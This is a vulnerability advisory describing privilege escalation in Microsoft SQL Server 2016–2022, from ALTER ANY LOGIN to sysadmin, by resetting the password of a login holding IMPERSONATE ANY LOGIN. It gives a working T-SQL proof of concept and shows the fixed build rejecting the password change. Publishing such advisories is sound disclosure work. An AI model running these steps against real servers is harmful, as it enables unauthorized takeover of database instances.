Title: MSSQL Database Privilege Elevation From ALTER ANY LOGIN To SYSADMIN Product: Microsoft SQL Server Vendor: Microsoft Affected Version(s): SQL Server 2016,2017,2019,2022 Tested Version(s): SQL Server 2016,2017,2019,2022 Fixed Build Versions: 16.0.4210.1 , 16.0.1145.1 , 15.0.4440.1, 15.0.2140.1 , 14.0.3500.1 , 14.0.2080.1, 13.0.7060.1 , 13.0.6465.1 Risk Level: Medium Solution Status: Fixed CVE Reference: N/A Author of Advisory: Emad Al-Mousa ***************************************** Vulnerability Details: Privilege escalation/elevation in Microsoft SQL Server database system is possible if a database login is granted the system privilege "ALTER ANY LOGIN", and if any of the existing SQL Server logins is granted the "IMPERSONATE ANY LOGIN" permission directly....then the account with "ALTER ANY LOGIN" permission will be able to reset/change the password of this account. Consequently, the attacker will be able connect using the account with "IMPERSONATE ANY LOGIN" to elevate his/her primary account to SYSADMIN role. By Design, SQL Server database login with "ALTER ANY LOGIN" permission can't change the passwords for "sa" built-in account, and can't change the password for logins granted “control server” , “sysadmin” , “securityadmin” as protection mechanism against privilege elevation attacks. ***************************************** Proof of Concept (PoC): I will create an account called dummy account called “kit” and will grant it ALTER ANY LOGIN permission USE [master] GO CREATE LOGIN [kit] WITH PASSWORD=N'kit123', DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF GO use [master] GO GRANT ALTER ANY LOGIN TO [kit] GO I will then access the SQL Server Instance using account “kit” , and will search for any login in the database instance that is granted “impersonate any login permission” for the aim to escalate my permissions. Will create two accounts that have “impersonate any login” permissions: USE [master] GO CREATE LOGIN [test1] WITH PASSWORD=N'test1', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF GO grant impersonate any login to [test1] GO // control server implicitly has the impersonation permission USE [master] GO CREATE LOGIN [test2] WITH PASSWORD=N'test2', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF GO grant control server to [test2] GO As “kit” login I try to alter/change the password for the two logins test1 & test2: USE [master] GO ALTER LOGIN [test1] WITH PASSWORD=N'emad@2025' GO USE [master] GO ALTER LOGIN [test2] WITH PASSWORD=N'emad@2025' GO So, I was able to change the password only for the login that is explicitly granted “impersonate any login” permission [test1 account], I can’t do that with logins granted “control server” , “sysadmin” , “securityadmin”, or “sa” account as expected and by design. After, successfully resetting the password for test1 account you can access the SQL Server Instance and escalate “kit” account to sysadmin as shown below: execute as login='sa' alter server role [sysadmin] add member [kit] GO Now, let me apply the latest Microsoft security update released in August 2025 KB5063756 and simulate it again: USE [master] GO ALTER LOGIN [test1] WITH PASSWORD=N'hot_summer@2025' GO It will be blocked with the error: Msg 15151, Level 16, State 1, Line 3 Cannot alter the login 'test1', because it does not exist or you do not have permission.